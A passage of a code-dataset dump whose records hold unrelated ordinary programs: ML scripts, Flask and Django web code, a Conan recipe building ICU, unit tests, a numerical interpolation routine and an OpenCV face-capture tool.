'weights'.\nw2 = tf.Variable(weights.initialized_value(), name=\"w20\")\n# Create another variable with twice the value of 'weights'\nw_twice = tf.Variable(weights.initialized_value() * 2.0, name=\"w_twice0\")\n\ninit_op=tf.initialize_all_variables()\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess:\n\tsess.run(init_op)\n\t#sess.run(tf.initialize_variables([w2,w_twice]))\n\t#sess.run(tf.initialize_variables([biases]))\n\t\t\n\tprint(sess.run(weights))\n\tprint(sess.run(biases))\n\tprint(sess.run(w2))\n\tprint(sess.run(w_twice))\n\t\n\tsave_path=saver.save(sess,\"/tmp/model.csv\")\n\tprint(\"MOdel saved in file: %s\"% save_path)\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"474394369","text":"import unittest\nfrom Ship import Ship\n\nclass TestShip(unittest.TestCase):\n\n def test_battleship_coords(self):\n ship = Ship(\"battleship\", \"H\", 1, \"A\")\n ship_body = [(0, 0), (0, 1), (0, 2), (0, 3)]\n self.assertEqual(ship_body, ship.get_body)\n\n ship = Ship(\"battleship\", \"V\", 1, \"A\")\n ship_body = [(0, 0), (1, 0), (2, 0), (3, 0)]\n self.assertEqual(ship_body, ship.get_body)\n\n def test_cruiser_coords(self):\n ship = Ship(\"cruiser\", \"H\", 1, \"A\")\n ship_body = [(0, 0), (0, 1), (0, 2)]\n self.assertEqual(ship_body, ship.get_body)\n\n ship = Ship(\"cruiser\", \"V\", 1, \"A\")\n ship_body = [(0, 0), (1, 0), (2, 0)]\n self.assertEqual(ship_body, ship.get_body)\n \n def test_destroyer_coords(self):\n ship = Ship(\"destroyer\", \"H\", 1, \"A\")\n ship_body = [(0, 0), (0, 1)]\n self.assertEqual(ship_body, ship.get_body)\n\n ship = Ship(\"destroyer\", \"V\", 1, \"A\")\n ship_body = [(0, 0), (1, 0)]\n self.assertEqual(ship_body, ship.get_body)\n \n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"TextbaseGames/Battleship/test_Ship.py","file_name":"test_Ship.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"583090172","text":"#!/usr/bin/python\nimport random\nimport os\n\n\nclass SloppyJoe(object):\n def __init__(self):\n ROOT = os.path.dirname(os.path.abspath(__file__))\n\n self.adjectives = [x.rstrip() for x in open(\"%s/%s\" % (ROOT, \"words.txt\")).readlines()]\n self.names = [x.rstrip() for x in open(\"%s/%s\" % (ROOT, 
\"names.txt\")).readlines()]\n\n def get_adjective(self):\n return random.sample(self.adjectives, 1)[0]\n\n def get_common_name(self, names=[]):\n if len(names) == 0:\n names = self.names\n\n return random.sample(names, 1)[0]\n\n def generate_name(self, alliterate=False):\n \"\"\"\n Returns a name that is made from a list of synonyms for sloppy and\n common names. If ``alliterate`` is True only names where the adjective\n and the common name have the same first character will be returned.\n \"\"\"\n names = self.names\n adjective = self.get_adjective()\n\n if alliterate:\n names = []\n\n while len(names) == 0:\n names = filter(lambda name: name[0] == adjective[0], self.names)\n\n # If there aren't any names, get a new adjective and try again.\n if len(names) == 0:\n adjective = self.get_adjective()\n\n name = self.get_common_name(names)\n return \"%s %s\" % (adjective, name)\n","sub_path":"chrispickett_me/projects/sloppyjoe/sloppyjoe.py","file_name":"sloppyjoe.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"460125165","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, session, url_for, make_response, Response\n)\nimport json\nfrom datetime import datetime\nfrom lastMeal.models.user import User\nfrom lastMeal.models.ingredient import Ingredient\nfrom bson.objectid import ObjectId\n\nfrom flask_jwt_extended import get_jwt_identity\nfrom flask_jwt_extended import jwt_required\nimport datetime as dt\nimport requests\n\n# Blueprint for connection to main process\nbp = Blueprint('recipes', __name__, url_prefix='/v1/recipes')\n\napi_key = ''\n\n# Basic Recipe Request Based on Ingredients\n@bp.route('', methods=['POST'])\n#@jwt_required()\ndef fetch_recipes():\n request_data = request.json\n\n ingredientList = request_data['ingredients']\n\n if ingredientList is None:\n return ({\"error\": \"no ingredients were passed\"}, 400)\n\n try:\n body = {\n 'ignorePantry': True,\n 'ingredients': ingredientList,\n 'limitLicense': False,\n 'number': 10,\n 'ranking': 1,\n 'apiKey': api_key\n }\n\n endpoint = \"https://api.spoonacular.com/recipes/findByIngredients\"\n\n headers={\n \"X-Mashape-Key\": api_key,\n \"X-Mashape-Host\": \"mashape host\"\n }\n \n r = requests.get(endpoint, params=body, headers=headers)\n recipe_results = r.json()\n\n print(\"TESTING SPOONACULAR RECIPE API\")\n print(recipe_results)\n\n new_data = {}\n\n new_data['recipe_data'] = recipe_results\n return ({'recipe_data': new_data}, 200)\n \n except Exception as e:\n print(e)\n return ({\"error\": \"Error in recipe fetch request\"}, 400)\n\n@bp.route('/', methods=['GET'])\n# @jwt_required()\ndef fetch_recipe_info(recipe_id):\n\n if recipe_id is None:\n return ({\"error\": \"No recipe ID was passed\"}, 400)\n \n try:\n endpoint = \"https://api.spoonacular.com/recipes/\" + recipe_id + \"/information\"\n\n body = {\n 'apiKey': api_key\n }\n\n headers={\n \"X-Mashape-Key\": api_key,\n \"X-Mashape-Host\": \"mashape host\"\n }\n\n r = requests.get(endpoint, params=body, headers=headers)\n recipe_info_results = r.json()\n\n new_data = {}\n\n new_data['recipe_info'] = recipe_info_results\n return ({'recipe_id': recipe_id, 'recipe_data': new_data}, 200)\n\n except Exception as e:\n print(e)\n return ({\"error: Error in recipe info fetch request\"}, 400)\n\n@bp.route('save/', methods=['GET'])\n# @jwt_required()\ndef user_favorite_recipe(recipe_id):\n pass \n # placeholder for user-favorited recipes; make sure 
that data is parsed before saving, and that the recipe ID is saved\n # Upon clicking on the UI, we can redirect to the same recipeInfo page that we do for the pantry/recipe page\n\n\n# Space here for any additional parsing we want to do in the backend\n","sub_path":"lastMeal/api/v1/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"121864953","text":"# [Note] http://numba.pydata.org/\n# [Note] http://numba.pydata.org/numba-doc/0.35.0/index.html\n# [Note] conda update numba\n\n\nimport numba\nfrom numba import jit, float32, int32, void, cuda\nfrom numpy import arange\nfrom timeit import default_timer as timer\n\nprint(\"Numba Version\", numba.__version__)\n\n# jit decorator tells Numba to compile this function.\n# The argument types will be inferred by Numba when function is called.\n@jit\ndef jit_sum_1(arr):\n M, N = arr.shape\n result = 0.0\n for i in range(M):\n for j in range(N):\n result += arr[i,j]\n return result\n\n\n@jit(float32(int32[:]))\ndef jit_sum_2(arr):\n M, N = arr.shape\n result = 0.0\n for i in range(M):\n for j in range(N):\n result += arr[i,j]\n return result\n\n\ndef sum(arr):\n M, N = arr.shape\n result = 0.0\n for i in range(M):\n for j in range(N):\n result += arr[i,j]\n return result\n\n\n# @cuda.jit(void(int32[:]))\n# def cuda_jit_sum(arr):\n# M, N = arr.shape\n# result = 0.0\n# for i in range(M):\n# for j in range(N):\n# result += arr[i,j]\n# return result\n\n\na = arange(900000000).reshape(30000, 30000)\nprint(a)\n\nprint()\n\ns = timer()\nresult = jit_sum_1(a)\ne = timer()\nprint(\"JIT_SUM_1: {:7.6f} ms\".format((e - s) * 1000))\nprint(result)\n\nprint()\n\ns = timer()\nresult = jit_sum_2(a)\ne = timer()\nprint(\"JIT_SUM_2: {:7.6f} ms\".format((e - s) * 1000))\nprint(result)\n\nprint()\n\ns = timer()\nresult = sum(a)\ne = timer()\nprint(\"NORMAL_SUM: {:7.6f} ms\".format((e - s) * 1000))\nprint(result)\n\nprint()\n\n# s = timer()\n# result = cuda_jit_sum(a)\n# e = timer()\n# print(\"{:7.6f} ms\".format((e - s) * 1000))\n# print(result)","sub_path":"1731061014_jinseojeong/numba_test/numba_test.py","file_name":"numba_test.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"573460268","text":"import tensorflow as tf\nfrom tensorflow.python.platform import gfile\nimport INCEPTION_V3_demo\nimport os.path\nimport random\nimport numpy as np\nimport glob\n\nBOTTLENECK_TENSOR_NAME = 'pool_3/_reshape:0'\n\n#图像输入张量所对应的名称。\nJPEG_DATA_TENSOR_NAME = 'DecodeJpeg/contents:0'\n\n#下载的谷歌训练好的Inception-v3模型文件目录。\n\n\nMODEL_FILE = 'graph.pb'\n\n\n\ndef create_image_test_lists():\n INPUT_DATA = 'test'\n file_list = []\n extensions = ['jpg', 'jpeg', '#JPG', '#JPEG']\n for extension in extensions:\n file_glob = os.path.join(INPUT_DATA, '*.' 
+ extension)\n file_list.extend(glob.glob(file_glob))\n return file_list \n\nimage_path = create_image_test_lists()[0]\n#获取图片内容。\nimage_data = gfile.GFile(image_path, 'rb').read()\n\ndef get_bottleneck_values():\n #load graph\n with gfile.GFile(\"path/to/model/classify_image_graph_def.pb\",'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n\n #加载读取的Inception-v3模型,并返回数据输入所对应的张量以及计算瓶颈层结果所对应\n #的张量。\n bottleneck_tensor, jpeg_data_tensor = tf.import_graph_def(graph_def,\n return_elements=[BOTTLENECK_TENSOR_NAME, JPEG_DATA_TENSOR_NAME])\n\n with tf.Session() as sess:\n bottleneck_values = sess.run(bottleneck_tensor, {jpeg_data_tensor: image_data})\n bottleneck_values = np.squeeze(bottleneck_values)\n\n return bottleneck_values\n \ndef main(self):\n train_bottlenecks = get_bottleneck_values()\n #load graph\n saver = tf.train.import_meta_graph(\"path/to/save/model.ckpt.meta\")\n\n with tf.Session() as sess:\n saver.restore(sess, \"path/to/save/model.ckpt\")\n train_bottlenecks = np.reshape(train_bottlenecks, (1,2048))\n \n c1 = sess.run(\"final_training_ops/Softmax:0\",feed_dict={\"BottleneckInputPlaceholder:0\":train_bottlenecks})\n print(c1)\n \n\nif __name__ == '__main__':\n tf.app.run()\n\n","sub_path":"Inception_V3/test_demo.py","file_name":"test_demo.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643862453","text":"def metodo_diferencias_divididas():\n # Polinomio interpolación\n # Diferencias diferencia dividida\n # Tarea: Verificar tamaño de vectores,\n # verificar puntos equidistantes en x\n import numpy as np\n import sympy as sym\n import matplotlib.pyplot as plt\n\n # INGRESO , Datos de prueba\n #xi = np.array([3.2, 3.8, 4.2, 4.5])\n #fi = np.array([5.12, 6.42, 7.25, 6.85])\n xi_aux = []\n fi_aux = []\n n_1 = 0\n while(True):\n try:\n n_1 = int(input(\"Cantidad de n >> \"))\n break\n except Exception as e:\n pass\n\n for _ in range(n_1):\n aux = float(input(\"x_{} >> \".format(_)))\n xi_aux.append(aux)\n\n for _ in range(n_1):\n aux = float(input(\"f_{} >> \".format(_)))\n fi_aux.append(aux)\n\n xi = np.array(xi_aux)\n fi = np.array(fi_aux)\n # PROCEDIMIENTO\n\n # Tabla de Diferencias divididas\n titulo = ['i','xi','fi']\n n = len(xi)\n ki = np.arange(0,n,1)\n tabla = np.concatenate(([ki],[xi],[fi]),axis=0)\n tabla = np.transpose(tabla)\n # diferencias \n dfinita = np.zeros(shape=(n,n),dtype=float)\n tabla = np.concatenate((tabla,dfinita), axis=1)\n # Calcula tabla, inicia en columna 3\n [n,m] = np.shape(tabla)\n diagonal = n-1\n j = 3\n while (j < m):\n # Añade título para cada columna\n titulo.append('df'+str(j-2))\n # cada fila de columna\n paso=j-2\n i = 0\n while (i < diagonal):\n numerador = tabla[i+1,j-1]-tabla[i,j-1]\n denominador = xi[i+paso]- xi[i]\n tabla[i,j] = numerador/denominador\n i = i+1\n diagonal = diagonal - 1\n j = j+1\n\n # POLINOMIO con diferencias divididas\n # caso: puntos equidistantes en eje x\n h = xi[1] - xi[0]\n dfinita = tabla[0,3:]\n n = len(dfinita)\n # expresión del polinomio con Sympy\n x = sym.Symbol('x')\n polinomio = fi[0]\n for j in range(1,n,1):\n factor = dfinita[j-1]\n termino = 1\n for k in range(0,j,1):\n termino = termino*(x-xi[k])\n polinomio = polinomio + termino*factor\n # simplifica multiplicando entre (x-xi)\n polisimple = polinomio.expand()\n\n # polinomio para evaluacion numérica\n px = sym.lambdify(x,polisimple)\n\n # Puntos para la gráfica\n muestras = 101\n a = np.min(xi)\n b = np.max(xi)\n pxi = 
np.linspace(a,b,muestras)\n pfi = px(pxi)\n\n # SALIDA\n np.set_printoptions(precision=3)\n print('Tabla Diferencia dividida')\n print([titulo])\n print(tabla)\n print('dividida: ')\n print(dfinita)\n print('polinomio: ')\n print(polinomio)\n print('polinomio simplificado: ' )\n print(polisimple)\n\n # Gráfica\n plt.plot(xi,fi,'o', label = 'Puntos')\n ##for i in range(0,n,1):\n ## plt.axvline(xi[i],ls='--', color='yellow')\n plt.plot(pxi,pfi, label = 'Polinomio')\n plt.legend()\n plt.xlabel('xi')\n plt.ylabel('fi')\n plt.title('diferencia dividida por newton')\n plt.show()\n#metodo_diferencias_divididas()","sub_path":"Diferencias_divididas.py","file_name":"Diferencias_divididas.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"78571426","text":"'''\r\nPython 3.6.0\r\n\r\nJenny Tso\r\nGUI Drill\r\n\r\n'''\r\n\r\nfrom tkinter import *\r\nimport tkinter as ttk\r\n\r\nimport fileTransfer_gui\r\nimport fileTransfer_functions\r\n\r\nclass ParentFrame(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master)\r\n self.master = master\r\n self.master.minsize(480, 420)\r\n self.master.maxsize(480, 420)\r\n #self.master.resizeable(False, False)\r\n #fileTransfer_functions.center_window(self, 480, 480)\r\n self.master.title(\"Transfer New or Modified Files\")\r\n self.master.configure(bg=\"#F0F0F0\")\r\n #self.master.protocol(\"WM_DELETE_WINDOW\", lambda: phonebook_func.ask_quit(self))\r\n fileTransfer_gui.window(self)\r\n\r\nif __name__ == \"__main__\":\r\n root = ttk.Tk()\r\n Application = ParentFrame(root)\r\n root.mainloop()\r\n \r\n","sub_path":"fileTransfer_main.py","file_name":"fileTransfer_main.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"442241088","text":"import os\nimport glob\nimport platform\nimport shutil\nfrom conans import ConanFile, tools, AutoToolsBuildEnvironment\n\n\nclass ICUBase(ConanFile):\n version = \"64.2\"\n homepage = \"http://site.icu-project.org\"\n license = \"ICU\"\n description = \"ICU is a mature, widely used set of C/C++ and Java libraries \" \\\n \"providing Unicode and Globalization support for software applications.\"\n url = \"https://github.com/bincrafters/conan-icu\"\n topics = (\"conan\", \"icu\", \"icu4c\", \"i see you\", \"unicode\")\n exports = [\"icu_base.py\"]\n # exports_sources = [\"patches/*.patch\"]\n _source_subfolder = \"source_subfolder\"\n _build_subfolder = \"build_subfolder\"\n _env_build = None\n short_paths = True\n\n @property\n def _the_os(self):\n return self.settings.get_safe(\"os\") or self.settings.get_safe(\"os_build\")\n\n @property\n def _the_arch(self):\n return self.settings.get_safe(\"arch\") or self.settings.get_safe(\"arch_build\")\n\n @property\n def _is_msvc(self):\n return self.settings.compiler == \"Visual Studio\"\n\n @property\n def _is_mingw(self):\n return self._the_os == \"Windows\" and self.settings.compiler == \"gcc\"\n\n def build_requirements(self):\n if self._the_os == \"Windows\":\n #self.build_requires(\"cygwin_installer/2.9.0@bincrafters/stable\")\n self.build_requires(\"msys2_installer/20161025@bincrafters/stable\")\n\n def source(self):\n version = self.version.replace('.', '-')\n version_with_underscore = self.version.replace('.', '_')\n source_url = \"https://github.com/unicode-org/icu/releases/download/release-{0}/icu4c-{1}-src.tgz\".format(version, version_with_underscore)\n 
self.output.info(\"Downloading {0} ...\".format(source_url))\n tools.get(source_url,\n sha256=\"627d5d8478e6d96fc8c90fed4851239079a561a6a8b9e48b0892f24e82d31d6c\")\n os.rename(\"icu\", self._source_subfolder)\n\n def _replace_pythonpath(self):\n if self._is_msvc:\n srcdir = os.path.join(self.build_folder, self._source_subfolder, \"source\")\n configure = os.path.join(self._source_subfolder, \"source\", \"configure\")\n tools.replace_in_file(configure,\n 'PYTHONPATH=\"$srcdir/data\"',\n 'PYTHONPATH=\"%s\\\\data\"' % srcdir)\n tools.replace_in_file(configure,\n 'PYTHONPATH=\"$srcdir/test/testdata:$srcdir/data\"',\n 'PYTHONPATH=\"%s\\\\test\\\\testdata;%s\\\\data\"' % (srcdir, srcdir))\n\n def _workaround_icu_20545(self):\n if tools.os_info.is_windows:\n # https://unicode-org.atlassian.net/projects/ICU/issues/ICU-20545\n srcdir = os.path.join(self.build_folder, self._source_subfolder, \"source\")\n makeconv_cpp = os.path.join(srcdir, \"tools\", \"makeconv\", \"makeconv.cpp\")\n tools.replace_in_file(makeconv_cpp,\n \"pathBuf.appendPathPart(arg, localError);\",\n \"pathBuf.append('/', localError); pathBuf.append(arg, localError);\")\n\n def build(self):\n for filename in glob.glob(\"patches/*.patch\"):\n self.output.info('applying patch \"%s\"' % filename)\n tools.patch(base_path=self._source_subfolder, patch_file=filename)\n\n if self._is_msvc:\n run_configure_icu_file = os.path.join(self._source_subfolder, 'source', 'runConfigureICU')\n\n flags = \"-%s\" % self.settings.compiler.runtime\n if self.settings.get_safe(\"build_type\") == 'Debug':\n flags += \" -FS\"\n tools.replace_in_file(run_configure_icu_file, \"-MDd\", flags)\n tools.replace_in_file(run_configure_icu_file, \"-MD\", flags)\n\n self._replace_pythonpath() # ICU 64.1\n self._workaround_icu_20545()\n\n self._env_build = AutoToolsBuildEnvironment(self)\n if not self.options.get_safe(\"shared\"):\n self._env_build.defines.append(\"U_STATIC_IMPLEMENTATION\")\n if tools.is_apple_os(self._the_os):\n self._env_build.defines.append(\"_DARWIN_C_SOURCE\")\n if self.settings.get_safe(\"os.version\"):\n self._env_build.flags.append(tools.apple_deployment_target_flag(self._the_os,\n self.settings.os.version))\n\n build_dir = os.path.join(self.build_folder, self._source_subfolder, 'build')\n os.mkdir(build_dir)\n\n with tools.vcvars(self.settings) if self._is_msvc else tools.no_op():\n with tools.environment_append(self._env_build.vars):\n with tools.chdir(build_dir):\n # workaround for https://unicode-org.atlassian.net/browse/ICU-20531\n os.makedirs(os.path.join(\"data\", \"out\", \"tmp\"))\n\n self.run(self._build_config_cmd, win_bash=tools.os_info.is_windows)\n if self.options.get_safe(\"silent\"):\n silent = '--silent' if self.options.silent else 'VERBOSE=1'\n else:\n silent = '--silent'\n command = \"make {silent} -j {cpu_count}\".format(silent=silent,\n cpu_count=tools.cpu_count())\n self.run(command, win_bash=tools.os_info.is_windows)\n if self.options.get_safe(\"with_unit_tests\"):\n command = \"make {silent} check\".format(silent=silent)\n self.run(command, win_bash=tools.os_info.is_windows)\n command = \"make {silent} install\".format(silent=silent)\n self.run(command, win_bash=tools.os_info.is_windows)\n\n self._install_name_tool()\n\n def package(self):\n if self._is_msvc:\n for dll in glob.glob( os.path.join( self.package_folder, 'lib', '*.dll' ) ):\n shutil.move( dll, os.path.join( self.package_folder, 'bin' ) )\n\n self.copy(\"LICENSE\", dst=\"licenses\", src=os.path.join(self.source_folder, self._source_subfolder))\n\n 
@staticmethod\n def detected_os():\n if tools.OSInfo().is_macos:\n return \"Macos\"\n if tools.OSInfo().is_windows:\n return \"Windows\"\n return platform.system()\n\n @property\n def cross_building(self):\n if tools.cross_building(self.settings):\n if self._the_os == self.detected_os():\n if self._the_arch == \"x86\" and tools.detected_architecture() == \"x86_64\":\n return False\n return True\n return False\n\n @property\n def build_config_args(self):\n prefix = self.package_folder.replace('\\\\', '/')\n platform = {(\"Windows\", \"Visual Studio\"): \"Cygwin/MSVC\",\n (\"Windows\", \"gcc\"): \"MinGW\",\n (\"AIX\", \"gcc\"): \"AIX/GCC\",\n (\"AIX\", \"xlc\"): \"AIX\",\n (\"SunOS\", \"gcc\"): \"Solaris/GCC\",\n (\"Linux\", \"gcc\"): \"Linux/gcc\",\n (\"Linux\", \"clang\"): \"Linux\",\n (\"Macos\", \"gcc\"): \"MacOSX\",\n (\"Macos\", \"clang\"): \"MacOSX\",\n (\"Macos\", \"apple-clang\"): \"MacOSX\"}.get((str(self._the_os),\n str(self.settings.compiler)))\n arch64 = ['x86_64', 'sparcv9', 'ppc64']\n bits = \"64\" if self._the_arch in arch64 else \"32\"\n args = [platform,\n \"--prefix={0}\".format(prefix),\n \"--with-library-bits={0}\".format(bits),\n \"--disable-samples\",\n \"--disable-layout\",\n \"--disable-layoutex\"]\n\n if self.cross_building:\n if self._env_build.build:\n args.append(\"--build=%s\" % self._env_build.build)\n if self._env_build.host:\n args.append(\"--host=%s\" % self._env_build.host)\n if self._env_build.target:\n args.append(\"--target=%s\" % self._env_build.target)\n\n if self.options.get_safe(\"data_packaging\"):\n args.append(\"--with-data-packaging={0}\".format(self.options.data_packaging))\n else:\n args.append(\"--with-data-packaging=static\")\n\n if self._is_mingw:\n mingw_chost = 'i686-w64-mingw32' if self._the_arch == 'x86' else 'x86_64-w64-mingw32'\n args.extend([\"--build={0}\".format(mingw_chost),\n \"--host={0}\".format(mingw_chost)])\n\n if self.settings.get_safe(\"build_type\") == \"Debug\":\n args.extend([\"--disable-release\", \"--enable-debug\"])\n if self.options.get_safe(\"shared\"):\n args.extend([\"--disable-static\", \"--enable-shared\"])\n else:\n args.extend([\"--enable-static\", \"--disable-shared\"])\n if not self.options.get_safe(\"with_unit_tests\"):\n args.append('--disable-tests')\n return args\n\n @property\n def _build_config_cmd(self):\n return \"../source/runConfigureICU %s\" % \" \".join(self.build_config_args)\n\n def _install_name_tool(self):\n if tools.is_apple_os(self._the_os):\n with tools.chdir(os.path.join(self.package_folder, 'lib')):\n for dylib in glob.glob('*icu*.{0}.dylib'.format(self.version)):\n command = 'install_name_tool -id {0} {1}'.format(os.path.basename(dylib), dylib)\n self.output.info(command)\n self.run(command)\n","sub_path":"icu_base.py","file_name":"icu_base.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16302025","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pickle\nimport codecs\nimport glob\nimport os\n\nhome = os.getcwd()\n\ndef get_text_list(path):\n list_id = []\n os.chdir(path)\n for file in glob.glob('*.txt'):\n list_id.append(file)\n return list_id\n\ndef get_train_text():\n pos_list = get_text_list('data_train/train/pos')\n os.chdir(home)\n pos_text = []\n for item in pos_list:\n f = codecs.open(''.join(['data_train/train/pos/', item]), 'r', 'utf-8')\n pos_text.append(f.read().replace('\\n', ' '))\n f.close()\n neg_list = 
get_text_list('data_train/train/neg')\n os.chdir(home)\n neg_text = []\n for item in neg_list:\n f = codecs.open(''.join(['data_train/train/neg/', item]), 'r', 'utf-8')\n neg_text.append(f.read().replace('\\n', ' '))\n f.close()\n del pos_list, neg_list\n return pos_text, neg_text\n\ndef get_test_text():\n pos_list = get_text_list('data_train/test/pos')\n os.chdir(home)\n pos_text = []\n for item in pos_list:\n f = codecs.open(''.join(['data_train/test/pos/', item]), 'r', 'utf-8')\n pos_text.append(f.read().replace('\\n', ' '))\n f.close()\n neg_list = get_text_list('data_train/test/neg')\n os.chdir(home)\n neg_text = []\n for item in neg_list: \n f = codecs.open(''.join(['data_train/test/neg/', item]), 'r', 'utf-8')\n neg_text.append(f.read().replace('\\n', ' '))\n f.close()\n del pos_list, neg_list\n return pos_text, neg_text\n\npos_text, neg_text = get_train_text()\ndata_train = pos_text + neg_text\nos.chdir(home)\npos_text, neg_text = get_test_text()\ndata_test = pos_text + neg_text\nos.chdir(home)\ndel pos_text, neg_text\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ntfidf_vectorizer = TfidfVectorizer()\nX_train = tfidf_vectorizer.fit_transform(data_train)\nX_test = tfidf_vectorizer.transform(data_test)\ndel data_train, data_test\npickle.dump(X_train, open('train','wb'))\npickle.dump(X_test, open('test','wb'))\ny_train = np.append(np.ones(15000), np.zeros(15000))\n#y_train = y_train.reshape((-1, 1))\ny_test = np.append(np.ones(5000), np.zeros(5000))\n\n#from sklearn.neural_network import MLPClassifier\n#from sklearn.metrics import accuracy_score\n#from sklearn.metrics import confusion_matrix\n#\n#clf = MLPClassifier(hidden_layer_sizes=(100,50,50), alpha=1e-5, max_iter=40,\n# verbose=10, random_state=1, tol=0.000000001)\n#clf.fit(X_train, y_train)\n#y_pred = clf.predict(X_test)\n#print(accuracy_score(y_test, y_pred))\n#cm = confusion_matrix(y_test, y_pred)\n#print(cm)\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom xgboost import XGBClassifier\n\nnames = ['Decision Tree', 'Random Forest', 'Gradient Boosting', 'XGBoost']\nmodels = [\n DecisionTreeClassifier(),\n RandomForestClassifier(n_estimators=100),\n GradientBoostingClassifier(n_estimators=100,\n validation_fraction=0.2,\n n_iter_no_change=5, tol=0.00001),\n XGBClassifier()]\naccuracy = []\nfor name, clf in zip(names, models):\n clf.fit(X_train, y_train)\n score = clf.score(X_test, y_test)\n accuracy.append(score)\n print('{} has accuracy {:.4f}'.format(name, score))\n\n#sns.heatmap(cm, center=True)\n#plt.show()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"155773239","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lilly', '0002_study_category'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='conditions',\n name='condition_term_rev',\n field=models.CharField(help_text=b'condition term words reversed and comma removed to match Study conditions', max_length=1000, null=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='conditions',\n name='condition_term',\n field=models.CharField(max_length=1000),\n preserve_default=True,\n ),\n 
]\n","sub_path":"studies/lilly/migrations/0003_auto_20150110_1614.py","file_name":"0003_auto_20150110_1614.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"113321135","text":"from django.urls import path\n\nfrom .views.base import IndexView, get_data_for_chart\nfrom .views.monitoring import MonitoringLhkasnView, get_table_lhkasn, MonitoringLhkpnView, get_table_lhkpn\nfrom .views.verifikator import BebanVerifikatorView, get_table_verifikator\n\napp_name = 'dashboardApp'\n\nurlpatterns = [\n path('ajax/get_data_for_chart/', get_data_for_chart, name='getDataChartUrl'),\n path('ajax/get_table_verifikator/', get_table_verifikator, name='getTableVerifikatorUrl'),\n path('ajax/get_table_lhkasn/', get_table_lhkasn, name='getTableLhkasnUrl'),\n path('ajax/get_table_lhkpn/', get_table_lhkpn, name='getTableLhkpnUrl'),\n\n path('beban-verifikator/', BebanVerifikatorView.as_view(), name='bebanVerifikatorUrl'),\n path('monitoring-lhkasn/', MonitoringLhkasnView.as_view(), name='monitoringLhkasnUrl'),\n path('monitoring-lhkpn/', MonitoringLhkpnView.as_view(), name='monitoringLhkpnUrl'),\n path('', IndexView.as_view(), name='indexUrl'),\n]\n","sub_path":"simpanan_berharga_v2/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"270057716","text":"import cv2\nfrom pathlib import Path\n\nfaceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\nvc = cv2.VideoCapture(0)\n\nprint(\"Enter the id and name of the person:\")\nuserId = input()\nuserName = input()\n\ncount = 1\n\ndef saveImage(img, userName, userId, imgId):\n Path(\"dataset/{}\".format(userName)).mkdir(parents=True, exist_ok=True)\n cv2.imwrite(\"dataset/{}/{}_{}.jpg\".format(userName, userId, imgId), img)\n\nwhile True:\n\n _, img = vc.read()\n\n originalImg = img\n\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale(gray_img,\n scaleFactor=1.2,\n minNeighbors=5,\n minSize=(50, 50))\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n coords = [x, y, w, h]\n\n imS = cv2.resize(img, (960, 540))\n cv2.imshow(\"identified image\", imS)\n\n key = cv2.waitKey(1) & 0xff\n\n if key == ord('s'):\n if count <= 100:\n roi_img = originalImg[coords[1]:coords[1]+coords[3], coords[0]:coords[0]+coords[2]]\n saveImage(roi_img, userName, userId, count)\n count += 1\n else:\n break\n elif key == ord('q'):\n break\n\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n\nvc.release()\ncv2.destroyAllWindows()\n","sub_path":"generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"529224828","text":"import json\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.utils.serializer_helpers import ReturnList\n\nclass RatebumJSONRenderer(JSONRenderer):\n charset = 'utf-8'\n object_label = 'object'\n\n def render(self, data, media_type=None, renderer_context=None):\n # If the view throws an error (such as the user can't be authenticated)\n 